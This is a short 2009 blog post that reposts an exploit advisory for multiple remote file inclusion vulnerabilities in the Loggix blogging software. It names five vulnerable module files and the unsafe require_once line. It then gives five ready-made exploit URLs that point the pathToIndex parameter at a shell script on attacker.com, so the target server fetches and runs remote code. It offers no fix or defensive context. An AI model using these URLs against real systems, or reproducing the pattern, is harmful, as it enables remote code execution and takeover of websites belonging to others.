Sunday, October 25, 2009

Multiple Remote File Include Vulnerability 

#Download Script      :  http://sourceforge.net/projects/loggix/files/
#Author               :  cr4wl3r
#Contact              :  milw0rm.com
#Dork                 :  No DoRk f0R ScRipT KiDDieS

#file :
#  Calendar.php
#  Comment.php
#  Rss.php
#  Trackback.php
#  LM_Downloads.php
########################################################################
#Bugs :
#  require_once $pathToIndex . '/lib/Loggix/Module.php';
########################################################################
#3xplo!t :
#http://target.com/[path]/lib/Loggix/Module/Calendar.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Comment.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Trackback.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToIndex=http://attacker.com/shell.txt???
p0st3d by : at
Label:

+++

Share |

"make something then You never be lost"

wibiya widget